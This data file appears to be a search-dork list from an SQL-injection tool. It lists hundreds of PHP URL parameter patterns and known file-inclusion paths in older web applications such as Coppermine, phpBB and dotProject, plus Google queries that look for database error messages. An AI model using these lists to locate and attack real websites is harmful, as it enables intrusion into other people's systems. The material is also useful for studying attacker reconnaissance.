sub.php?qry= 1000 | head.php?module= 1001 | nota.php?opcion= 1002 | head.php?abre= 1003 | base.php?str= 1004 | home.php?bOdy= 1005 | gery.php?module= 1006 | head.php?sivu= 1007 | page.php?inc= 1008 | pagina.php?header= 1009 | mod.php?v= 1010 | home.php?doshow= 1011 | padrao.php?n= 1012 | index1.php?chapter= 1013 | padrao.php?basepath= 1014 | index.php?r= 1015 | index3.php?seccion= 1016 | sitio.php?mid= 1017 | index.php?where= 1018 | general.php?type= 1019 | pagina.php?goto= 1020 | page.php?pa= 1021 | default.php?menue= 1022 | main.php?goto= 1023 | index1.php?abre= 1024 | info.php?seccion= 1025 | index2.php?pa= 1026 | layout.php?pageweb= 1027 | nota.php?disp= 1028 | index1.php?bOdy= 1029 | default.php?nivel= 1030 | show.php?header= 1031 | down.php?pag= 1032 | start.php?tipo= 1033 | standard.php?w= 1034 | index.php?open= 1035 | blank.php?menu= 1036 | general.php?nivel= 1037 | padrao.php?nivel= 1038 | inc.php?addr= 1039 | index.php?var= 1040 | home.php?redirect= 1041 | inc.php?link= 1042 | inc.php?incl= 1043 | padrao.php?corpo= 1044 | down.php?url= 1045 | enter.php?goto= 1046 | down.php?addr= 1047 | sub.php?j= 1048 | principal.php?f= 1049 | sub.php?menue= 1050 | index2.php?section= 1051 | general.php?my= 1052 | head.php?loader= 1053 | general.php?goto= 1054 | include.php?dir= 1055 | start.php?header= 1056 | blank.php?in= 1057 | base.php?name= 1058 | nota.php?goFile= 1059 | head.php?base_dir= 1060 | mod.php?recipe= 1061 | press.php?pr= 1062 | padrao.php?[]= 1063 | layout.php?opcion= 1064 | print.php?rub= 1065 | index.php?pr= 1066 | general.php?seite= 1067 | pagina.php?numero= 1068 | inc.php?pg= 1069 | nota.php?rub= 1070 | view.php?seite= 1071 | pagina.php?recipe= 1072 | index.php?pref= 1073 | page.php?action= 1074 | page.php?ev= 1075 | show.php?ir= 1076 | head.php?index= 1077 | mod.php?pname= 1078 | view.php?ir= 1079 | inc.php?start= 1080 | principal.php?rub= 1081 | principal.php?corpo= 1082 | padrao.php?middle= 1083 | base.php?pname= 1084 | template.php?header= 1085 | view.php?sp= 1086 | main.php?name= 1087 | nota.php?m= 1088 | blank.php?open= 1089 | head.php?dir= 1090 | page.php?pname= 1091 | inc.php?k= 1092 | index.php?pollname= 1093 | head.php?oldal= 1094 | index1.php?str= 1095 | template.php?choix= 1096 | down.php?pollname= 1097 | page.php?recipe= 1098 | template.php?corpo= 1099 | nota.php?sec= 1100 | info.php?[]= 1101 | sub.php?[]= 1102 | page.php?q= 1103 | index1.php?type= 1104 | gery.php?y= 1105 | standard.php?lang= 1106 | gery.php?page= 1107 | index.php?action= 1108 | press.php?pname= 1109 | down.php?v= 1110 | index3.php?second= 1111 | show.php?recipe= 1112 | main.php?pre= 1113 | file.php?numero= 1114 | print.php?str= 1115 | standard.php?link= 1116 | nota.php?OpenPage= 1117 | view.php?pollname= 1118 | print.php?l= 1119 | index.php?go= 1120 | standard.php?numero= 1121 | view.php?pr= 1122 | down.php?read= 1123 | down.php?action= 1124 | index1.php?OpenPage= 1125 | principal.php?left= 1126 | mod.php?start= 1127 | file.php?bOdy= 1128 | gery.php?pg= 1129 | blank.php?qry= 1130 | base.php?eval= 1131 | default.php?left= 1132 | gery.php?param= 1133 | blank.php?pa= 1134 | nota.php?b= 1135 | path.php?loader= 1136 | start.php?o= 1137 | include.php?include= 1138 | nota.php?corpo= 1139 | enter.php?second= 1140 | sub.php?pname= 1141 | mod.php?pageweb= 1142 | principal.php?addr= 1143 | standard.php?action= 1144 | template.php?lang= 1145 | include.php?basepath= 1146 | sub.php?ir= 1147 | /single-post.php?id= 1148 | /post.php?id= 1149 | /news.php?id= 1150 | down.php?nivel= 1151 | path.php?opcion= 1152 | print.php?category= 1153 | print.php?menu= 1154 | layout.php?secao= 1155 | template.php?param= 1156 | /page.php?id= 1157 | standard.php?ref= 1158 | base.php?include= 1159 | blank.php?bOdy= 1160 | path.php?pref= 1161 | print.php?g= 1162 | /product.php?id= 1163 | padrao.php?subject= 1164 | nota.php?modo= 1165 | index3.php?loader= 1166 | template.php?seite= 1167 | general.php?pageweb= 1168 | index2.php?param= 1169 | path.php?nivel= 1170 | page.php?pref= 1171 | press.php?pref= 1172 | enter.php?ev= 1173 | standard.php?middle= 1174 | index2.php?recipe= 1175 | blank.php?dir= 1176 | home.php?pageweb= 1177 | view.php?panel= 1178 | down.php?home= 1179 | head.php?ir= 1180 | mod.php?ir= 1181 | show.php?pagina= 1182 | default.php?base_dir= 1183 | show.php?loader= 1184 | path.php?mid= 1185 | blank.php?abre= 1186 | down.php?choix= 1187 | info.php?opcion= 1188 | page.php?loader= 1189 | principal.php?oldal= 1190 | index1.php?load= 1191 | home.php?content= 1192 | pagina.php?sekce= 1193 | file.php?n= 1194 | include.php?redirect= 1195 | print.php?itemnav= 1196 | enter.php?index= 1197 | print.php?middle= 1198 | sitio.php?goFile= 1199 | head.php?include= 1200 | enter.php?e= 1201 | index.php?play= 1202 | enter.php?id= 1203 | view.php?mod= 1204 | show.php?nivel= 1205 | file.php?channel= 1206 | layout.php?choix= 1207 | info.php?bOdy= 1208 | include.php?go= 1209 | index3.php?nivel= 1210 | sub.php?include= 1211 | path.php?numero= 1212 | principal.php?header= 1213 | main.php?opcion= 1214 | enter.php?s= 1215 | sub.php?pre= 1216 | include.php?index= 1217 | gery.php?pageweb= 1218 | padrao.php?path= 1219 | info.php?url= 1220 | press.php?ev= 1221 | index1.php?pg= 1222 | print.php?in= 1223 | general.php?modo= 1224 | head.php?ki= 1225 | press.php?my= 1226 | index1.php?pollname= 1227 | principal.php?to= 1228 | default.php?play= 1229 | page.php?g= 1230 | nota.php?pg= 1231 | blank.php?destino= 1232 | blank.php?z= 1233 | /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine 1234 | mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= 1235 | zentrack/index.php?configFile= 1236 | inst/index.php?lng=../../include/main.inc&G_PATH= 1237 | pivot/modules/module_db.php?pivot_path= 1238 | include/write.php?dir= 1239 | includes/header.php?systempath= 1240 | becommunity/community/index.php?pageurl= 1241 | agendax/addevent.inc.php?agendax_path= 1242 | myPHPCalendar/admin.php?cal_dir= 1243 | yabbse/Sources/Packages.php?sourcedir= 1244 | zboard/zboard.php 1245 | path_of_cpcommerce/_functions.php?prefix 1246 | dotproject/modules/projects/addedit.php?root_dir= 1247 | dotproject/modules/projects/view.php?root_dir= 1248 | dotproject/modules/projects/vw_files.php?root_dir= 1249 | dotproject/modules/tasks/addedit.php?root_dir= 1250 | dotproject/modules/tasks/viewgantt.php?root_dir= 1251 | My_eGery/public/displayCategory.php?basepath= 1252 | modules/My_eGery/public/displayCategory.php?basepath= 1253 | modules/4nAlbum/public/displayCategory.php?basepath= 1254 | modules/coppermine/themes/default/theme.php?THEME_DIR= 1255 | modules/agendax/addevent.inc.php?agendax_path= 1256 | modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= 1257 | modules/xgery/upgrade_album.php?GERY_BASEDIR= 1258 | modules/coppermine/include/init.inc.php?CPG_M_DIR= 1259 | shoutbox/expanded.php?conf= 1260 | library/editor/editor.php?root= 1261 | library/lib.php?root= 1262 | main.php?x= 1263 | default.php?page= 1264 | default.php?bOdy= 1265 | index.php?url= 1266 | index.php?arquivo= 1267 | index.php?include= 1268 | index.php?visualizar= 1269 | index.php?pagina= 1270 | index.php?page= 1271 | index.php?p= 1272 | index.php?cont= 1273 | index.php?x= 1274 | index.php?cat= 1275 | index.php?site= 1276 | index.php?configFile= 1277 | index.php?do= 1278 | index2.php?x= 1279 | Index.php?id= 1280 | /components/com_forum/download.php?phpbb_root_path= 1281 | /admin/index.php?o= admin/index.php 1282 | /admin/index.php?o= admin/index.php 1283 | index.php?menu=deti&page= 1284 | /tools/send_reminders.php?includedir= 1285 | SQuery/lib/gore.php?libpath= 1286 | m2f/m2f_phpbb204.php?m2f_root_path= 1287 | wamp_dir/setup/yesno.phtml?no_url= 1288 | components/com_forum/download.php?phpbb_root_path= 1289 | index.php?p= 1290 | index.php?pag= 1291 | template.php?page= 1292 | main.php?page= 1293 | index2.php?pag= 1294 | home.php?pag= 1295 | index.php?page= 1296 | default.php?page= 1297 | inc/cmses/aedatingCMS.php?dir[inc]= 1298 | /modules/vwar/admin/admin.php?vwar_root= 1299 | bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= 1300 | encapscms_PATH/core/core.php?root= 1301 | inc/session.php?sessionerror=0&lang= 1302 | path/index.php?function=custom&custom= 1303 | [MyAlbum_DIR]/language.inc.php?langs_dir= 1304 | /inc/irayofuncs.php?irayodirhack= 1305 | index.php?function=custom&custom= 1306 | inc/header.php/step_one.php?server_inc= 1307 | inst/index.php?lng= 1308 | inc/pipe.php?HCL_path= 1309 | include/new-visitor.inc.php?lvc_include_dir= 1310 | includes/header.php?systempath= 1311 | support/mailling/maillist/inc/initdb.php?absolute_path= 1312 | coppercop/theme.php?THEME_DIR= 1313 | zentrack/index.php?configFile= 1314 | include/write.php?dir= 1315 | include/new-visitor.inc.php?lvc_include_dir= 1316 | includes/header.php?systempath= 1317 | support/mailling/maillist/inc/initdb.php?absolute_path= 1318 | coppercop/theme.php?THEME_DIR= 1319 | becommunity/community/index.php?pageurl= 1320 | shoutbox/expanded.php?conf= 1321 | agendax/addevent.inc.php?agendax_path= 1322 | myPHPCalendar/admin.php?cal_dir= 1323 | yabbse/Sources/Packages.php?sourcedir= 1324 | path_of_cpcommerce/_functions.php?prefix= 1325 | dotproject/modules/tasks/viewgantt.php?root_dir= 1326 | My_eGery/public/displayCategory.php?basepath= 1327 | modules/My_eGery/public/displayCategory.php?basepath= 1328 | modules/4nAlbum/public/displayCategory.php?basepath= 1329 | modules/coppermine/themes/default/theme.php?THEME_DIR= 1330 | modules/agendax/addevent.inc.php?agendax_path= 1331 | modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= 1332 | modules/xgery/upgrade_album.php?GERY_BASEDIR= 1333 | modules/coppermine/include/init.inc.php?CPG_M_DIR= 1334 | modules/mod_mainmenu.php?mosConfig_absolute_path= 1335 | pivot/modules/module_db.php?pivot_path= 1336 | library/editor/editor.php?root= 1337 | library/lib.php?root= 1338 | e107/e107_handlers/secure_img_render.php?p= 1339 | main.php?x= 1340 | main.php?page= 1341 | default.php?page= 1342 | default.php?bOdy= 1343 | default.php?page= 1344 | index.php?url= 1345 | index.php?arquivo= 1346 | index.php?meio.php= 1347 | index.php?include= 1348 | index.php?open= 1349 | index.php?visualizar= 1350 | index.php?pagina= 1351 | index.php?inc= 1352 | index.php?page= 1353 | index.php?pag= 1354 | index.php?p= 1355 | index.php?content= 1356 | index.php?cont= 1357 | index.php?c= 1358 | index.php?meio= 1359 | index.php?x= 1360 | index.php?cat= 1361 | index.php?site= 1362 | index.php?configFile= 1363 | index.php?action= 1364 | index.php?do= 1365 | index2.php?x= 1366 | Index.php?id= 1367 | announcements.php?phpraid_dir= 1368 | arg.php?arg= 1369 | args.php?arg= 1370 | atom.php5?page= 1371 | auto.php?inc= 1372 | auto.php?page= 1373 | base.php?f1= 1374 | base.php?f1= 1375 | board.php?see= 1376 | book.php5?page= 1377 | calendar.php?l= -------------------------------------------------------------------------------- /Ex-SQLi-Termux/dork.txt: -------------------------------------------------------------------------------- 1 | single-post.php?id= 2 | en/product.php?id= 3 | trainers.php?id= 4 | play_old.php?id= 5 | declaration_more.php?decl_id= 6 | Pageid= 7 | games.php?id= 8 | newsDetail.php?id= 9 | staff_id= 10 | historialeer.php?num= 11 | product-item.php?id= 12 | news_view.php?id= 13 | humor.php?id= 14 | communique_detail.php?id= 15 | sem.php3?id= 16 | opinions.php?id= 17 | spr.php?id= 18 | pages.php?id= 19 | chappies.php?id= 20 | prod_detail.php?id= 21 | viewphoto.php?id= 22 | view.php?id= 23 | website.php?id= 24 | hosting_info.php?id= 25 | gery.php?id= 26 | detail.php?ID= 27 | publications.php?id= 28 | Productinfo.php?id= 29 | releases.php?id= 30 | ray.php?id= 31 | produit.php?id= 32 | pop.php?id= 33 | shopping.php?id= 34 | productdetail.php?id= 35 | post.php?id= 36 | section.php?id= 37 | theme.php?id= 38 | page.php?id= 39 | shredder-categories.php?id= 40 | product_ranges_view.php?ID= 41 | shop_category.php?id= 42 | channel_id= 43 | newsid= 44 | news_display.php?getid= 45 | ages.php?id= 46 | clanek.php4?id= 47 | review.php?id= 48 | iniziativa.php?in= 49 | curriculum.php?id= 50 | labels.php?id= 51 | look.php?ID= 52 | galeri_info.php?l= 53 | tekst.php?idt= 54 | newscat.php?id= 55 | newsticker_info.php?idn= 56 | rubrika.php?idr= 57 | offer.php?idf= 58 | index.php?id= 59 | buy.php?category= 60 | article.php?ID= 61 | play_old.php?id= 62 | newsitem.php?num= 63 | top10.php?cat= 64 | historialeer.php?num= 65 | reagir.php?num= 66 | Stray-Questions-View.php?num= 67 | forum_bds.php?num= 68 | game.php?id= 69 | view_product.php?id= 70 | sw_comment.php?id= 71 | news.php?id= 72 | avd_start.php?avd= 73 | event.php?id= 74 | sql.php?id= 75 | news_view.php?id= 76 | select_biblio.php?id= 77 | humor.php?id= 78 | ogl_inet.php?ogl_id= 79 | fiche_spectacle.php?id= 80 | communique_detail.php?id= 81 | sem.php3?id= 82 | kategorie.php4?id= 83 | faq2.php?id= 84 | show_an.php?id= 85 | preview.php?id= 86 | loadpsb.php?id= 87 | opinions.php?id= 88 | spr.php?id= 89 | announce.php?id= 90 | participant.php?id= 91 | download.php?id= 92 | main.php?id= 93 | review.php?id= 94 | chappies.php?id= 95 | read.php?id= 96 | prod_detail.php?id= 97 | article.php?id= 98 | person.php?id= 99 | productinfo.php?id= 100 | showimg.php?id= 101 | view.php?id= 102 | website.php?id= 103 | hosting_info.php?id= 104 | gery.php?id= 105 | rub.php?idr= 106 | view_faq.php?id= 107 | artikelinfo.php?id= 108 | detail.php?ID= 109 | index.php?= 110 | profile_view.php?id= 111 | category.php?id= 112 | publications.php?id= 113 | fellows.php?id= 114 | downloads_info.php?id= 115 | prod_info.php?id= 116 | shop.php?do=part&id= 117 | collectionitem.php?id= 118 | band_info.php?id= 119 | product.php?id= 120 | releases.php?id= 121 | ray.php?id= 122 | produit.php?id= 123 | pop.php?id= 124 | shopping.php?id= 125 | productdetail.php?id= 126 | post.php?id= 127 | viewshowdetail.php?id= 128 | clubpage.php?id= 129 | memberInfo.php?id= 130 | section.php?id= 131 | theme.php?id= 132 | page.php?id= 133 | shredder-categories.php?id= 134 | tradeCategory.php?id= 135 | product_ranges_view.php?ID= 136 | shop_category.php?id= 137 | transcript.php?id= 138 | channel_id= 139 | item_id= 140 | newsid= 141 | trainers.php?id= 142 | news-full.php?id= 143 | news_display.php?getid= 144 | index2.php?option= 145 | readnews.php?id= 146 | newsone.php?id= 147 | product-item.php?id= 148 | pages.php?id= 149 | clanek.php4?id= 150 | viewapp.php?id= 151 | viewphoto.php?id= 152 | galeri_info.php?l= 153 | iniziativa.php?in= 154 | curriculum.php?id= 155 | labels.php?id= 156 | story.php?id= 157 | look.php?ID= 158 | aboutbook.php?id= 159 | “id=” & intext:”Warning: mysql_fetch_assoc() 160 | “id=” & intext:”Warning: is_writable() 161 | “id=” & intext:”Warning: Unknown() 162 | “id=” & intext:”Warning: mysql_result() 163 | “id=” & intext:”Warning: pg_exec() 164 | “id=” & intext:”Warning: require() 165 | buy.php?category= 166 | pageid= 167 | page.php?file= 168 | show.php?id= 169 | newsitem.php?num= 170 | readnews.php?id= 171 | top10.php?cat= 172 | reagir.php?num= 173 | Stray-Questions-View.php?num= 174 | forum_bds.php?num= 175 | game.php?id= 176 | view_product.php?id= 177 | sw_comment.php?id= 178 | news.php?id= 179 | avd_start.php?avd= 180 | event.php?id= 181 | sql.php?id= 182 | select_biblio.php?id= 183 | ogl_inet.php?ogl_id= 184 | fiche_spectacle.php?id= 185 | kategorie.php4?id= 186 | faq2.php?id= 187 | show_an.php?id= 188 | loadpsb.php?id= 189 | announce.php?id= 190 | participant.php?id= 191 | download.php?id= 192 | article.php?id= 193 | person.php?id= 194 | productinfo.php?id= 195 | showimg.php?id= 196 | rub.php?idr= 197 | view_faq.php?id= 198 | artikelinfo.php?id= 199 | index.php?= 200 | profile_view.php?id= 201 | category.php?id= 202 | fellows.php?id= 203 | downloads_info.php?id= 204 | prod_info.php?id= 205 | shop.php?do=part&id= 206 | collectionitem.php?id= 207 | band_info.php?id= 208 | product.php?id= 209 | viewshowdetail.php?id= 210 | clubpage.php?id= 211 | memberInfo.php?id= 212 | tradeCategory.php?id= 213 | transcript.php?id= 214 | item_id= 215 | news-full.php?id= 216 | aboutbook.php?id= 217 | preview.php?id= 218 | material.php?id= 219 | read.php?id= 220 | viewapp.php?id= 221 | story.php?id= 222 | newsone.php?id= 223 | rubp.php?idr= 224 | art.php?idm= 225 | title.php?id= 226 | index1.php?modo= 227 | include.php?[]= 228 | nota.php?pollname= 229 | index3.php?p= 230 | padrao.php?pre= 231 | home.php?pa= 232 | main.php?type= 233 | sitio.php?start= 234 | .php?include= 235 | general.php?xlink= 236 | show.php?go= 237 | nota.php?ki= 238 | down.php?oldal= 239 | layout.php?disp= 240 | enter.php?chapter= 241 | base.php?incl= 242 | enter.php?mod= 243 | show.php?corpo= 244 | head.php?[]= 245 | info.php?strona= 246 | template.php?str= 247 | main.php?doshow= 248 | view.php?[]= 249 | index.php?to= 250 | page.php?cmd= 251 | view.php?b= 252 | info.php?option= 253 | show.php?x= 254 | template.php?texto= 255 | index3.php?ir= 256 | print.php?chapter= 257 | file.php?inc= 258 | file.php?cont= 259 | view.php?cmd= 260 | include.php?chapter= 261 | path.php?my= 262 | principal.php?param= 263 | general.php?menue= 264 | index1.php?b= 265 | info.php?chapter= 266 | nota.php?chapter= 267 | general.php?include= 268 | start.php?addr= 269 | index1.php?qry= 270 | index1.php?loc= 271 | page.php?addr= 272 | index1.php?dir= 273 | principal.php?pr= 274 | press.php?seite= 275 | head.php?cmd= 276 | home.php?sec= 277 | home.php?category= 278 | standard.php?cmd= 279 | mod.php?thispage= 280 | base.php?to= 281 | view.php?choix= 282 | base.php?panel= 283 | template.php?mod= 284 | info.php?j= 285 | blank.php?pref= 286 | sub.php?channel= 287 | standard.php?in= 288 | general.php?cmd= 289 | pagina.php?panel= 290 | template.php?where= 291 | path.php?channel= 292 | gery.php?seccion= 293 | page.php?tipo= 294 | sitio.php?rub= 295 | pagina.php?u= 296 | file.php?ir= 297 | inc.php?sivu= 298 | path.php?start= 299 | page.php?chapter= 300 | home.php?recipe= 301 | enter.php?pname= 302 | layout.php?path= 303 | print.php?open= 304 | mod.php?channel= 305 | down.php?phpbb_root_path= 306 | inc.php?str= 307 | gery.php?phpbb_root_path= 308 | include.php?middlePart= 309 | sub.php?destino= 310 | info.php?read= 311 | home.php?sp= 312 | main.php?strona= 313 | sitio.php?get= 314 | sitio.php?index= 315 | index3.php?option= 316 | enter.php?a= 317 | main.php?second= 318 | print.php?pname= 319 | blank.php?itemnav= 320 | blank.php?pagina= 321 | index1.php?d= 322 | down.php?where= 323 | inc.php?include= 324 | path.php?pre= 325 | home.php?loader= 326 | start.php?eval= 327 | index.php?disp= 328 | head.php?mod= 329 | sitio.php?section= 330 | nota.php?doshow= 331 | home.php?seite= 332 | home.php?a= 333 | page.php?url= 334 | pagina.php?left= 335 | layout.php?c= 336 | principal.php?goto= 337 | standard.php?base_dir= 338 | home.php?where= 339 | page.php?sivu= 340 | inc.php?adresa= 341 | padrao.php?str= 342 | include.php?my= 343 | show.php?home= 344 | index.php?load= 345 | index3.php?rub= 346 | sub.php?str= 347 | start.php?index= 348 | nota.php?mod= 349 | sub.php?mid= 350 | index1.php?[]= 351 | pagina.php?oldal= 352 | padrao.php?loc= 353 | padrao.php?rub= 354 | page.php?incl= 355 | gery.php?disp= 356 | nota.php?oldal= 357 | include.php?u= 358 | principal.php?pagina= 359 | print.php?choix= 360 | head.php?filepath= 361 | include.php?corpo= 362 | sub.php?action= 363 | head.php?pname= 364 | press.php?dir= 365 | show.php?xlink= 366 | file.php?left= 367 | nota.php?destino= 368 | general.php?module= 369 | index3.php?redirect= 370 | down.php?param= 371 | default.php?ki= 372 | padrao.php?h= 373 | padrao.php?read= 374 | mod.php?cont= 375 | index1.php?l= 376 | down.php?pr= 377 | gery.php?viewpage= 378 | template.php?load= 379 | nota.php?pr= 380 | padrao.php?destino= 381 | index2.php?channel= 382 | principal.php?opcion= 383 | start.php?str= 384 | press.php?[]= 385 | index.php?ev= 386 | pagina.php?pre= 387 | nota.php?content= 388 | include.php?adresa= 389 | sitio.php?t= 390 | index.php?sivu= 391 | principal.php?q= 392 | path.php?ev= 393 | print.php?module= 394 | index.php?loc= 395 | nota.php?basepath= 396 | padrao.php?tipo= 397 | index2.php?in= 398 | principal.php?eval= 399 | file.php?qry= 400 | info.php?t= 401 | enter.php?play= 402 | general.php?var= 403 | principal.php?s= 404 | standard.php?pagina= 405 | standard.php?subject= 406 | base.php?second= 407 | head.php?inc= 408 | pagina.php?basepath= 409 | main.php?pname= 410 | inc.php?modo= 411 | include.php?goto= 412 | file.php?pg= 413 | head.php?g= 414 | general.php?header= 415 | start.php?root= 416 | enter.php?pref= 417 | index3.php?open= 418 | start.php?module= 419 | main.php?load= 420 | enter.php?pg= 421 | padrao.php?redirect= 422 | pagina.php?my= 423 | gery.php?pre= 424 | enter.php?w= 425 | info.php?texto= 426 | enter.php?open= 427 | base.php?rub= 428 | gery.php?[]= 429 | include.php?cmd= 430 | standard.php?dir= 431 | layout.php?page= 432 | index3.php?pageweb= 433 | include.php?numero= 434 | path.php?destino= 435 | index3.php?home= 436 | default.php?seite= 437 | path.php?eval= 438 | base.php?choix= 439 | template.php?cont= 440 | info.php?pagina= 441 | default.php?x= 442 | default.php?option= 443 | gery.php?ki= 444 | down.php?second= 445 | blank.php?path= 446 | pagina.php?v= 447 | file.php?pollname= 448 | index3.php?var= 449 | layout.php?goto= 450 | pagina.php?incl= 451 | home.php?action= 452 | include.php?oldal= 453 | print.php?left= 454 | print.php?u= 455 | nota.php?v= 456 | home.php?str= 457 | press.php?panel= 458 | page.php?mod= 459 | default.php?param= 460 | down.php?texto= 461 | mod.php?dir= 462 | view.php?where= 463 | blank.php?subject= 464 | path.php?play= 465 | base.php?l= 466 | index2.php?rub= 467 | general.php?opcion= 468 | layout.php?xlink= 469 | padrao.php?name= 470 | pagina.php?nivel= 471 | default.php?oldal= 472 | template.php?k= 473 | main.php?chapter= 474 | layout.php?chapter= 475 | layout.php?incl= 476 | include.php?url= 477 | base.php?sivu= 478 | index.php?link= 479 | sub.php?cont= 480 | info.php?oldal= 481 | general.php?rub= 482 | default.php?str= 483 | head.php?ev= 484 | sub.php?path= 485 | view.php?page= 486 | main.php?j= 487 | index2.php?basepath= 488 | gery.php?qry= 489 | main.php?url= 490 | default.php?incl= 491 | show.php?redirect= 492 | index1.php?pre= 493 | general.php?base_dir= 494 | start.php?in= 495 | show.php?abre= 496 | index1.php?home= 497 | home.php?ev= 498 | index2.php?ki= 499 | base.php?pag= 500 | default.php?ir= 501 | general.php?qry= 502 | index2.php?home= 503 | press.php?nivel= 504 | enter.php?pr= 505 | blank.php?loader= 506 | start.php?cmd= 507 | padrao.php?d= 508 | sitio.php?recipe= 509 | principal.php?read= 510 | standard.php?showpage= 511 | main.php?pg= 512 | page.php?panel= 513 | press.php?addr= 514 | template.php?s= 515 | main.php?tipo= 516 | inc.php?ev= 517 | padrao.php?page= 518 | show.php?thispage= 519 | home.php?secao= 520 | main.php?start= 521 | enter.php?mid= 522 | press.php?id= 523 | main.php?inc= 524 | index3.php?cmd= 525 | index.php?pname= 526 | press.php?subject= 527 | include.php?sec= 528 | index3.php?xlink= 529 | general.php?texto= 530 | index3.php?go= 531 | index.php?cmd= 532 | index3.php?disp= 533 | index3.php?left= 534 | sub.php?middle= 535 | show.php?modo= 536 | index1.php?pagina= 537 | head.php?left= 538 | enter.php?phpbb_root_path= 539 | show.php?z= 540 | start.php?basepath= 541 | blank.php?strona= 542 | template.php?y= 543 | page.php?where= 544 | layout.php?category= 545 | index1.php?my= 546 | principal.php?phpbb_root_path= 547 | nota.php?channel= 548 | page.php?choix= 549 | start.php?xlink= 550 | home.php?k= 551 | standard.php?phpbb_root_path= 552 | principal.php?middlePart= 553 | mod.php?m= 554 | index.php?recipe= 555 | template.php?path= 556 | pagina.php?dir= 557 | sitio.php?abre= 558 | index1.php?recipe= 559 | blank.php?page= 560 | sub.php?category= 561 | inc.php?bOdy= 562 | enter.php?middle= 563 | home.php?path= 564 | down.php?pre= 565 | base.php?w= 566 | main.php?path= 567 | nota.php?ir= 568 | press.php?link= 569 | gery.php?pollname= 570 | down.php?open= 571 | down.php?pageweb= 572 | default.php?eval= 573 | view.php?showpage= 574 | show.php?get= 575 | sitio.php?tipo= 576 | layout.php?cont= 577 | default.php?destino= 578 | padrao.php?seccion= 579 | down.php?r= 580 | main.php?param= 581 | standard.php?e= 582 | down.php?in= 583 | nota.php?include= 584 | sitio.php?secao= 585 | print.php?my= 586 | general.php?abre= 587 | general.php?link= 588 | default.php?id= 589 | standard.php?panel= 590 | show.php?channel= 591 | enter.php?r= 592 | index3.php?phpbb_root_path= 593 | gery.php?where= 594 | head.php?middle= 595 | sub.php?load= 596 | gery.php?sp= 597 | show.php?chapter= 598 | sub.php?b= 599 | general.php?adresa= 600 | print.php?goto= 601 | sub.php?sp= 602 | template.php?doshow= 603 | padrao.php?base_dir= 604 | index2.php?my= 605 | include.php?w= 606 | start.php?op= 607 | main.php?section= 608 | view.php?header= 609 | layout.php?menue= 610 | head.php?y= 611 | sub.php?content= 612 | show.php?type= 613 | base.php?id= 614 | mod.php?qry= 615 | default.php?strona= 616 | sitio.php?chapter= 617 | gery.php?index= 618 | nota.php?h= 619 | page.php?oldal= 620 | enter.php?panel= 621 | blank.php?t= 622 | start.php?pollname= 623 | sub.php?module= 624 | enter.php?thispage= 625 | mod.php?index= 626 | sitio.php?r= 627 | sub.php?play= 628 | index2.php?doshow= 629 | index2.php?chapter= 630 | show.php?path= 631 | gery.php?to= 632 | info.php?base_dir= 633 | gery.php?abre= 634 | gery.php?pag= 635 | view.php?channel= 636 | default.php?mod= 637 | index.php?op= 638 | general.php?pre= 639 | padrao.php?type= 640 | template.php?pag= 641 | standard.php?pre= 642 | blank.php?ref= 643 | down.php?z= 644 | general.php?inc= 645 | home.php?read= 646 | pagina.php?section= 647 | default.php?basepath= 648 | index.php?pre= 649 | sitio.php?pageweb= 650 | base.php?seite= 651 | inc.php?j= 652 | index2.php?filepath= 653 | file.php?type= 654 | index1.php?oldal= 655 | index2.php?second= 656 | index3.php?sekce= 657 | info.php?filepath= 658 | base.php?opcion= 659 | path.php?category= 660 | index3.php?start= 661 | start.php?rub= 662 | inc.php?i= 663 | blank.php?pre= 664 | general.php?channel= 665 | index2.php?OpenPage= 666 | page.php?section= 667 | mod.php?middle= 668 | index1.php?goFile= 669 | blank.php?action= 670 | principal.php?loader= 671 | sub.php?op= 672 | main.php?addr= 673 | start.php?mid= 674 | gery.php?secao= 675 | pagina.php?tipo= 676 | index.php?w= 677 | head.php?where= 678 | principal.php?tipo= 679 | press.php?loader= 680 | gery.php?showpage= 681 | gery.php?go= 682 | enter.php?start= 683 | press.php?lang= 684 | general.php?p= 685 | index.php?sekce= 686 | index2.php?get= 687 | sitio.php?go= 688 | include.php?cont= 689 | sub.php?where= 690 | index3.php?index= 691 | path.php?recipe= 692 | info.php?loader= 693 | print.php?sp= 694 | page.php?phpbb_root_path= 695 | path.php?bOdy= 696 | principal.php?menue= 697 | print.php?cont= 698 | pagina.php?z= 699 | default.php?mid= 700 | blank.php?xlink= 701 | sub.php?oldal= 702 | general.php?b= 703 | include.php?left= 704 | print.php?sivu= 705 | press.php?OpenPage= 706 | default.php?cont= 707 | general.php?pollname= 708 | template.php?nivel= 709 | enter.php?page= 710 | file.php?middle= 711 | standard.php?str= 712 | gery.php?get= 713 | main.php?v= 714 | down.php?subject= 715 | enter.php?sivu= 716 | path.php?option= 717 | index.php?strona= 718 | index1.php?choix= 719 | index2.php?f= 720 | press.php?destino= 721 | pagina.php?channel= 722 | principal.php?b= 723 | home.php?include= 724 | head.php?numero= 725 | general.php?ref= 726 | main.php?dir= 727 | gery.php?cont= 728 | principal.php?type= 729 | file.php?param= 730 | default.php?secao= 731 | path.php?pageweb= 732 | info.php?r= 733 | base.php?phpbb_root_path= 734 | main.php?itemnav= 735 | view.php?pg= 736 | pagina.php?choix= 737 | default.php?itemnav= 738 | index2.php?cmd= 739 | layout.php?url= 740 | index.php?path= 741 | index1.php?second= 742 | start.php?modo= 743 | index1.php?get= 744 | index3.php?my= 745 | sub.php?left= 746 | print.php?inc= 747 | view.php?type= 748 | path.php?[]= 749 | base.php?adresa= 750 | index3.php?oldal= 751 | standard.php?bOdy= 752 | base.php?path= 753 | principal.php?strona= 754 | info.php?l= 755 | template.php?left= 756 | head.php?loc= 757 | page.php?ir= 758 | print.php?path= 759 | down.php?path= 760 | sitio.php?opcion= 761 | pagina.php?category= 762 | press.php?menu= 763 | index2.php?pref= 764 | sitio.php?incl= 765 | show.php?ki= 766 | index3.php?x= 767 | page.php?strona= 768 | inc.php?open= 769 | index3.php?secao= 770 | standard.php?[]= 771 | template.php?basepath= 772 | standard.php?goFile= 773 | index2.php?ir= 774 | file.php?modo= 775 | gery.php?itemnav= 776 | main.php?oldal= 777 | down.php?showpage= 778 | start.php?destino= 779 | blank.php?rub= 780 | path.php?ir= 781 | layout.php?var= 782 | index1.php?texto= 783 | start.php?pg= 784 | index1.php?showpage= 785 | info.php?go= 786 | path.php?load= 787 | 